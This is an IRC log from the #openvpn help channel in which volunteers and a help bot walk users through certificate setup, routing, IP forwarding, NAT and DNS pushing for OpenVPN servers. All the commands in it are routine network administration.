15:25 < pekster> If you're using --auth-user-pass-verify, the way to add users is not part of openvpn 15:25 < fogus> "Setting up your own Certificate Authority (CA) and generating certificates and keys for an OpenVPN server and multiple clients" ? 15:25 < rob0> well, "history" as root would not make sense. 
The CA should not even be on the server machine, really. 15:25 < fogus> Then it probably is. 15:25 < rob0> (and definitely not owned by root on any machine.) 15:26 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:26 < fogus> yep, it is. 15:27 < pekster> PKI files owned by root isn't strictly the problem, but it becomes one when you do all your PKI interaction by calling programs needlessly as root 15:27 < fogus> I see, ok. 15:27 < pekster> (since root can access any file anyway, it's not permissions but the implication of execution that's bad for security) 15:28 < fogus> Is /usr/share/doc/openvpn/examples/easy-rsa/2.0/build-key what I'm after then? 15:28 < fogus> `which build-key` returns nothing 15:29 < pekster> Probably, although you shouldn't be running your PKI out of the /usr/share/doc/ subdirectory. You should have made a copy somewhere else so your next distro software upgrade doesn't wipe out your local changes 15:29 < fogus> That sounds like something intelligent. 15:29 < rob0> Again, ideally: as a non-root user on a non-VPN machine. 15:30 < fogus> So, when my Mac-running user asks to get in the VPN, I have to send him a generated private key? 15:30 -!- raidz_away is now known as raidz 15:31 < fogus> I mean, is that one way of doing it? 15:31 < pekster> In short, yes. "Even better" security is to have a way to generate the keypair on the client device, have the client send a certificate signing request (CSR, sometimes called a .req file) to the CA, the CA signs it, and sends back the certificate. Many people use the Easy-RSA 2.x stuff to build the key on the system and send it to the client. It's easier, but less secure as someone else has the private key and password 15:32 < fogus> Gotcha, that's what the paragraph starting with "The answer is ostensibly yes. In the example above..." says? 15:32 < rob0> ^^ 15:34 < fogus> Ok. 
and the "./build-dh" command, that must have been already run and the output files in place for this server to be presently serving VPN users? 15:34 < pekster> That's a one-time operation, just like creating your CA keypair 15:34 < pekster> You can change DH params any time you want; only the server uses that, and it's not consisdered private information 15:35 < fogus> The server does not have a username associated with these client keys, does it? 15:36 < pekster> The server references the CN (the certificate's "Common Name") as the unique identity of the user 15:38 < fogus> Does the user have to put that CN in his client software? 15:39 < pekster> Nope, it's included in the certificate itself 15:42 < pekster> Here's a small sample from a test cert I generated in my testing: http://paste.kde.org/696716/ 15:42 < pekster> In that example, the cert CN is "client1" and the issuing CA is "Easy-RSA CA" 15:49 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 264 seconds] 15:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 258 seconds] 15:56 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 16:03 -!- dazo is now known as dazo_afk 16:03 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 16:03 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 16:09 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 16:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds] 16:16 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has left #openvpn [] 16:27 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 16:30 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 16:30 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Read error: Connection reset by peer] 16:31 -!- staticsafe 
[staticsafe@unaffiliated/staticsafe] has left #openvpn ["WeeChat 0.4.0"] 16:36 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 16:39 -!- JSharpe_ is now known as JSharpe 16:39 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 16:41 < jzaw> pekster, ive been looking at that traceroute 16:42 < jzaw> and its got me baffled .... surely if i can ping / browse / email down the vpn 16:42 < jzaw> from the client end 16:42 < Nemus> !ifconfig 16:42 <@vpnHelper> "ifconfig" is usage: ifconfig l rn | Set TUN/TAP adapter parameters. l is the IP address of the local VPN endpoint. For TUN devices, rn is the IP address of the remote VPN endpoint. For TAP devices, rn is the subnet mask of the virtual ethernet segment which is being created or connected to. 16:42 < jzaw> and i can ping from lan side of router and all lan clients on the server end 16:43 < jzaw> ive got my routes right? 16:46 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Read error: Connection reset by peer] 16:47 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 16:47 < pekster> jzaw: If you're not using redirect-gateway, the reply might be asymmetrically routed as the client will respond to my public IP sending the ping out its native connection, not the VPN 16:47 < pekster> If it is, chances are a firewall has blocked it at some point along the path 16:49 < pekster> Note that the traceroute was done using ICMP echo-request packets, not the traditional UDP packets (since you asked for a ping, I figured I might as well just trace with pings too for you) 16:50 -!- p3rror [~mezgani@41.248.140.203] has joined #openvpn 16:51 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Read error: Connection reset by peer] 16:51 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 16:58 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Read error: Connection reset by peer] 16:59 -!- Camicio 
[~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 17:01 -!- JSharpe [~JSharpe@5.63.146.148] has quit [Quit: Leaving] 17:07 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Ping timeout: 258 seconds] 17:10 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 17:16 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 17:19 -!- joeblow750 [~Adium@cpc13-haye17-2-0-cust143.haye.cable.virginmedia.com] has joined #openvpn 17:20 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 17:24 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 17:32 < jzaw> jzaw: If you're not using redirect-gateway, the reply might be asymmetrically routed as the client will respond to my public IP sending the ping out its native connection, not the VPN 17:32 < jzaw> ahhhh that makes v good sense 17:33 < jzaw> my main problem from here is im remote to the home lan .... and these things need testing from without rather than within the network 17:33 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:33 < jzaw> if youve time can you do a trace using udp ? 17:33 < pekster> Get a remote shell somewhere. I'm not sure what tools the normal 'users' group gets, but SDF (at sdf.org, aka freeshell.org) has free shell accounts. Well, "free" although they do ask for a $1 donation to keep out spam 17:34 < pekster> Sure, I'm about to leave for the afternoon, but let me get you a UDP trace 17:35 < jzaw> i have seen them pekster i was wondering if they were *safe* 17:35 < jzaw> ie later inundate you with spam 17:36 < jzaw> but of course i can just use a throwaway alias on my email 17:36 < pekster> They're fine. 
They're also old as dirt 17:36 < pekster> No, the guy who runs it (smj, Stephen Johnson IIRC) is one of the good guys 17:36 < jzaw> :) 17:36 < pekster> And since they've been around forever, you can get a gopher page set up ;) 17:37 < pekster> It's worth donating at least the $1, and honestly, a one-time donation of $36 to become part of the 'ARPA' group is really worth it too 17:37 < pekster> I did that several years ago, and best $36 one-time fee for shell access you'll find a lot of places 17:38 < pekster> http://paste.kde.org/696878/ 17:38 < jzaw> nice! 17:38 < pekster> Looks like your systems (the vpn. and further in) did reply to the ping, but they drop traceroute traffic 17:38 * pekster disappears 17:39 < jzaw> i did a one time donation years ago to dyndns as it was back then ... well i did 2x ... and ive got two permanent no cost real domains with them 17:39 < jzaw> useful for playing 17:40 < jzaw> can you tell whats dropping stuff at hop18? 17:40 < jzaw> ah hes gone ta for now 17:40 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:02 -!- joeblow750 [~Adium@cpc13-haye17-2-0-cust143.haye.cable.virginmedia.com] has quit [Quit: Leaving.] 
18:08 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 18:14 -!- brute11k [~brute@89.249.231.109] has quit [Read error: Connection reset by peer] 18:17 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 18:29 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:39 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 18:40 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:40 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:41 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 18:41 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 18:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:48 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 19:00 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 264 seconds] 19:02 -!- p3rror [~mezgani@41.248.140.203] has quit [Ping timeout: 258 seconds] 19:35 -!- raidz is now known as raidz_away 19:38 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:41 -!- rickbol [~rickbol@173-132-103-55.pools.spcsdns.net] has joined #openvpn 19:49 -!- rickbol [~rickbol@173-132-103-55.pools.spcsdns.net] has quit [Read error: Connection reset by peer] 19:57 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 20:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 20:04 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:05 -!- rickbol [~rickbol@cpe-174-096-184-106.carolina.res.rr.com] has joined #openvpn 20:15 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 20:31 -!- MeanderingCode [~Meanderin@199.254.238.206] has 
joined #openvpn 20:35 < nutcase> my openvpn suddenly seems to have stopped working O.o 20:35 < nutcase> I can connect to the server and do anything internally on the server but its not routing traffic outside of its own little network 20:43 -!- fogus [~fogus@pool-108-21-49-67.nycmny.fios.verizon.net] has left #openvpn ["WHO #dordt-cs"] 20:53 -!- Devastator [~devas@186.214.110.30] has quit [Changing host] 20:53 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 21:04 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 21:04 < hrenovo> hi. new openvpn installation here on debian 6.0.7. So openvpn service starts and I can confirm that it is listening on netstat -anp | grep :1194 21:04 < hrenovo> but 21:05 < hrenovo> telnet localhost 1194 returns telnet: Unable to connect to remote host: Connection refused 21:05 < jpalmer> does it show *:1194 or 0.0.0.0:1194? 21:06 < jpalmer> paste the output of your "netstat -anp | grep :1194" 21:06 < hrenovo> jpalmer: thanks on it 21:07 < rob0> um, is that TCP or UDP? I thought udp was -u and tcp was -t 21:07 < hrenovo> http://fpaste.org/w4zK/ 21:07 < rob0> anyway, telnet(1) is TCP. You can test UDP with nc(1) 21:08 < hrenovo> jpalmer: different port 21:08 < hrenovo> jpalmer: forget 1194, its port 1337 21:08 < jpalmer> hrenovo: ok, so, you'd need to connect to that port. and as rob0 rightly pointed out, telnet won't work, since you are using udp 21:09 < jpalmer> which also means, if you have a firewall in place.. you need to open that port for udp traffic, not tcp traffic 21:09 < hrenovo> so its all fine ? 21:09 < hrenovo> http://fpaste.org/pJDW/ 21:10 < jpalmer> looks fine, from that. have you tried connecting a client? 21:10 < hrenovo> no not yet 21:10 < jpalmer> (but the interface being up, doesn't necessarily mean it's working as expected) 21:10 < hrenovo> ah I see 21:11 < hrenovo> I will install the client now 21:11 < hrenovo> or should I try from another linux box ? 
21:12 < jpalmer> I'd do it from the.. client you want connected to the vpn server 21:13 < hrenovo> i've used openvpn over 2 years ago so please forgive me 21:14 < hrenovo> openvpn server is a debian box 21:14 < hrenovo> client will be centos 21:14 < hrenovo> i hope its not a problem 21:20 < jpalmer> it's not. 21:27 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 21:27 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 21:31 < hrenovo> jpalmer: hmm. configured the client in centos 21:31 < hrenovo> jpalmer: fails to start 21:32 < hrenovo> I wonder if I can look up the log 21:32 < hrenovo> I know why 21:33 < hrenovo> yup, I can ping the server ) 21:34 < hrenovo> cools !!! 21:35 < hrenovo> I wonder if it will for from windows if I install cygwin 21:35 < hrenovo> if it will work* 21:39 < hrenovo> where is the server log ? 21:50 < pekster> OpenVPN has native Windows installers 21:50 < pekster> !download 21:50 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 21:50 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 22:01 < hrenovo> ok 22:01 < hrenovo> I am connected to openvpn server with windows vpn-gui 22:02 < hrenovo> but 22:02 < hrenovo> when I go to check my IP address in the web browser, it is not changed 22:02 < hrenovo> www.whatismyip.com 22:02 < hrenovo> I was under the impression that it should show the wan ip of openvpn server ... 
22:03 < pekster> Connecting to a VPN is nothing but a connection between the client and server 22:03 <@EugeneKay> !redirect 22:03 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:03 <@vpnHelper> http://ircpimps.org/redirect.png 22:03 <@EugeneKay> hrenovo ^ 22:03 < pekster> EugeneKay: Bleh, I had a much more wordy preface to that :P 22:03 <@EugeneKay> The flowchart works well. 22:04 <@EugeneKay> pekster - neener neener neener 22:04 < hrenovo> redirect.png is 404 in the web browser 22:04 <@EugeneKay> Worksforme 22:05 < hrenovo> maybe its cached for you 22:06 < pekster> Nope, shift-reload (bypasses cache) is fine 22:06 < pekster> I can mirror it if you'd like 22:06 < hrenovo> please 22:06 < pekster> fwiw, fresh download via wget on my headless box works too 22:07 < pekster> Mirror: http://pekster.sdf.org/misc/redirect.png 22:08 < hrenovo> hmm 22:08 < hrenovo> so much networking 22:08 < hrenovo> ouch 22:09 <@EugeneKay> Yup. 22:09 < hrenovo> how would I enable redirect gateway on windows client ? 22:09 <@EugeneKay> !def1 22:09 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 22:10 < hrenovo> so I am just editing the client.conf ? 22:10 < hrenovo> no matter linux or windows right ? 
22:11 <@EugeneKay> Put what is listed in #3 in the server.conf 22:11 -!- athetius_ [~sollux@athetius.com] has left #openvpn [] 22:11 <@EugeneKay> Or, if you just want one client to redirect, put the bit inside "" in your client.conf 22:12 < hrenovo> no, all clients is fine 22:12 < hrenovo> If I understand this right 22:14 < hrenovo> right now in server.conf I have this - ;push "redirect-gateway def1 bypass-dhcp" 22:15 < hrenovo> should I change that to push "redirect-gateway def1" 22:15 < hrenovo> ? 22:26 < hrenovo> I changed it 22:27 <@EugeneKay> Yeah, no need for bypass-dhcp 22:27 < hrenovo> now I can connect with a client, but now internet is not working on the client 22:27 < hrenovo> hehe 22:27 <@EugeneKay> Good. That means it's working 22:27 < hrenovo> really ? 22:27 <@EugeneKay> Yup. 22:27 < hrenovo> lol 22:27 <@EugeneKay> Now continue down the flowchart :-p 22:27 < hrenovo> but no internet 22:28 < hrenovo> ah ! ok 22:28 < hrenovo> very interesting ... 22:29 < hrenovo> yeah, ip forwarding not enabled I guess 22:29 < hrenovo> how would I enable ip forwarding ? 22:30 <@EugeneKay> The bot knows all 22:30 <@EugeneKay> !ipforward 22:30 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 22:31 < hrenovo> damn 22:31 < hrenovo> I don't understand networking that well 22:31 < hrenovo> I am not even sure if the ip forwarding should be enabled on the client or the server 22:32 <@EugeneKay> !redirect 22:32 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:32 <@vpnHelper> http://ircpimps.org/redirect.png 22:32 <@EugeneKay> See #1 ;-) 22:32 < hrenovo> lol 22:33 < hrenovo> !linipforward 22:33 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 22:37 < hrenovo> ok i've done #1 22:37 < hrenovo> but not sure if I need to restart any service 22:39 < pekster> !basic 22:39 <@vpnHelper> "basic" is if you do not understand basic networking, you probably should not be administrating a vpn... you should understand the basics of routing / firewalls first 22:39 < pekster> !tcpip 22:39 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 22:42 < hrenovo> I am sure this is an interesting book 22:42 < hrenovo> but I am just an average user 22:42 < hrenovo> or should I say below average 22:42 < hrenovo> compared to you pekster 22:43 < hrenovo> i'd be glad to follow a guide on this if there was one available 22:43 < hrenovo> this way I won't have to bother irc channel 22:44 < pekster> flowchart + google (and any references the bot has) are a good start 22:44 < pekster> A VPN is a somewhat advanced form of networking, especially when you're playing with routing across it. 
Having poor networking skills is a severe hindrance when you're trying to do semi-advanced networking 22:46 < hrenovo> I asked if there should be a service restarted after adding net.ipv4.ip_forward = 1 in sysctl.conf 22:46 < pekster> Values under /proc/sys/ (or controlled via sysctl) take effect right away. You should make the changes persistent in the way your OS exposes sysctl settings to you 22:46 <@EugeneKay> sysctl.conf is applied at boot. fiddling with /proc/sys/ applies immediately. 22:46 <@EugeneKay> (but is lost at boot) 22:51 < hrenovo> can't save ip_forward for some reason 22:52 < hrenovo> nvm got it 22:54 < hrenovo> still can't ping 8.8.8.8 from the client 22:55 -!- MeanderingCode [~Meanderin@199.254.238.206] has quit [Ping timeout: 264 seconds] 22:55 < hrenovo> is #1 enough for "linipforward" ? 22:55 <@EugeneKay> #3 too 22:59 < hrenovo> okay did #3 23:01 < hrenovo> can't see it in iptables -L 23:02 <@EugeneKay> It'll be in the nat table(-L -t nat) 23:02 <@EugeneKay> If you have anything in the filter table you'll need to make the appropriate hole so traffic from tun+ can get out eth+ 23:02 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has joined #openvpn 23:04 < hrenovo> EugeneKay: http://fpaste.org/Tmh9/ 23:04 < hrenovo> I am not even sure if its added or not 23:05 < hrenovo> from looking at the output 23:05 < stan_man_can> I'm trying to get my openvpn to work as a proxy. The openvpn server is running on an ubuntu vps, and my client machine is osx 23:06 < stan_man_can> I've added push "redirect-gateway def1" to my server.conf 23:06 <@EugeneKay> !redirect 23:06 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 23:06 <@vpnHelper> http://ircpimps.org/redirect.png 23:06 < hrenovo> lol same problem 23:06 <@EugeneKay> stan_man_can - follow the chart ^ 23:06 < stan_man_can> EugeneKay: I believe the problem is something to do with the DNS 23:06 <@EugeneKay> The chart+bot know all ;-) 23:06 < stan_man_can> when I add the push "dhcp-option DNS 10.8.0.1" my client continually reconnects 23:07 <@EugeneKay> !dns 23:07 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 23:07 < hrenovo> !ipforward 23:07 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. 
it must be enabled in the kernel AND allowed in the firewall 23:07 <@EugeneKay> !pushdns 23:07 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 23:07 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 23:07 < hrenovo> !nat 23:07 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 23:08 < hrenovo> EugeneKay: do you think i'm all good with !ipforward now ? 23:08 <@EugeneKay> hrenovo - dunno; I'd have to look at your system, and that costs $150/hr. :-p 23:08 < hrenovo> ) 23:08 <@EugeneKay> If you've got the sysctl entry sorted then yes 23:09 < stan_man_can> is the sysctl on server or client? 23:09 < hrenovo> server 23:09 < stan_man_can> !sysctl 23:09 <@EugeneKay> sysctl is a linux thing; the setting in question is performed on the server. 23:10 < hrenovo> should I restart the server to make sure sysctl kicks in ? 23:10 < hrenovo> restart the host I mean 23:10 <@EugeneKay> No; the /proc/sys is fine 23:10 < hrenovo> ok 23:10 <@EugeneKay> If you typo'ed it won't work on boot, so if you wanna make sure then go for it. 
I tend not to assume incompetence tho 23:10 < hrenovo> I understand 23:10 < stan_man_can> whats the link to the sysctl stuff again 23:11 < hrenovo> I am still not sure if I got #3 working 23:11 <@EugeneKay> !linipforwward 23:11 <@EugeneKay> !linipforward 23:11 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 23:11 <@EugeneKay> hrenovo - if you can ping a public IP(through the VPN) then it did. 23:11 <@EugeneKay> The networking is probably the trickiest bit of it, after the PKI setup. 23:11 <@EugeneKay> Annnnd it's breakfast time 23:11 <@EugeneKay> Toodles, and good luck 23:12 < stan_man_can> Oh god the DNS pushing looks like a huge headache 23:12 < hrenovo> I added iptables -I FORWARD -i tun+ -j ACCEPT and showed you the paste of iptables -L -l nat http://fpaste.org/Tmh9/ 23:12 < hrenovo> looks good ? 23:13 < hrenovo> its pinging !!!! 
23:13 < hrenovo> yaaaaaay 23:19 < hrenovo> crap 23:19 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Read error: Operation timed out] 23:20 < hrenovo> no i can't 23:20 < hrenovo> I thought I was able to ping 8.8.8.8 but I wasn't connected to vpn ( 23:20 < hrenovo> as soon as I connect I can't ping it 23:22 < hrenovo> i'm stuck 23:22 < hrenovo> I am tempted to restart the host 23:22 < hrenovo> but this will kick me off the irc 23:23 < hrenovo> !nat 23:23 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 23:24 < hrenovo> !linnat 23:24 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 23:27 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has left #openvpn [] 23:28 < hrenovo> EugeneKay: http://fpaste.org/bZ88/ 23:28 < hrenovo> I made this change 23:28 < hrenovo> but still can't ping 8.8.8.8 23:29 < hrenovo> MASQUERADE all -- 10.8.0.0/24 anywhere 23:30 < hrenovo> or should it be MASQUERADE all -- 10.8.0.1/24 anywhere 23:30 < hrenovo> ? 
23:39 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] --- Day changed Fri Mar 15 2013 00:02 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Read error: Operation timed out] 00:10 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 00:22 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 00:24 -!- Visitorerer [~Visitorer@64.111.86.226] has joined #openvpn 00:25 < Visitorerer> My friend and I are connected through Tunnelblick, but we can't ping each other. Config/logs here : http://pastebin.com/7rvRbivz 00:30 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 00:31 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 00:39 -!- p3rror [~mezgani@41.140.31.21] has joined #openvpn 00:40 -!- p3rror [~mezgani@41.140.31.21] has quit [Read error: Connection reset by peer] 00:49 -!- p3rror [~mezgani@41.140.31.21] has joined #openvpn 01:05 < jzaw> morning all 01:05 < jzaw> can i ip rule add from / table 01:06 < jzaw> or do i really have to go into /etc/iproute2/rt_tables and edit that 01:06 < jzaw> before i can test things? 01:07 < jzaw> this http://wiki.openwrt.org/doc/networking/routing 01:07 < jzaw> suggests single hosts 01:07 < jzaw> id want to do whole nets .... is that ok? 01:08 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:22 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 01:24 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 01:42 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 01:49 < pekster> jzaw: Yup, all the 'ip' commands take CIDR masks to define networks unless it's for something strictly requiring a host, like PtP peering 01:51 < pekster> And no need to name a table unless you want to. 
You can use arbitrary numbers for tables 01:55 < jzaw> thats cool pekster 01:55 < jzaw> can you tell me if this is sane ? 01:56 < pekster> What using numbers? Sure 01:56 < jzaw> remove route ... 81.2.122.192/26 via 10.0.0.1 dev tap0 01:56 < jzaw> ip rule add from 81.2.122.192/26 table 10 01:57 < jzaw> ip route add 81.2.122.192/26 via 10.0.0.1 dev tap0 table 10 01:57 < jzaw> ip route flush 01:57 < jzaw> flush cache i mean 01:57 < pekster> You generally still want the route on the default table, otherwise the kernel can't reach the VPN network range itself unless you send it to table 10 01:57 < jzaw> so not delete 81.2.122.192/26 via 10.0.0.1 dev tap0 01:58 < pekster> It's valid to set a table up like that, but it's not much use unless you plan to do something specific with the table 01:58 < jzaw> well i just want those icmp's to come back down the right route :D 01:59 < jzaw> hehe 01:59 < jzaw> also ... im thinking its causing problems with my voip 01:59 < pekster> Oh, you're trying to route that range across the VPN? Why not just push a route then... 01:59 < jzaw> in a similar fashion ... since the rtp can be p2p and thus come down the vpn but go out the nat 02:01 < jzaw> i do ... push "route 81.2.122.192 255.255.255.192" 02:01 < jzaw> from server.conf ^^ 02:01 < pekster> Right, then clients route that range across the VPN when the tunnel is up 02:01 < jzaw> yes 02:02 < pekster> It's just a route entry. Unless you need to route different types of traffic differently, you shouldn't be messing with multiple routing tables 02:02 < jzaw> so other than sending all traffic down the vpn 02:02 < jzaw> is there a cure for that asymmetrical routing the icmp seem to take 02:02 < jzaw> i thought source routing might help 02:03 < pekster> Ah, okay. You should define your goal upfront (it saves a lot of time.) 02:03 * jzaw nods :) 02:03 < pekster> Is the system receiving the ping your VPN client? 02:04 < jzaw> no fuji-pl.dzki.co.uk is behind the router ... 
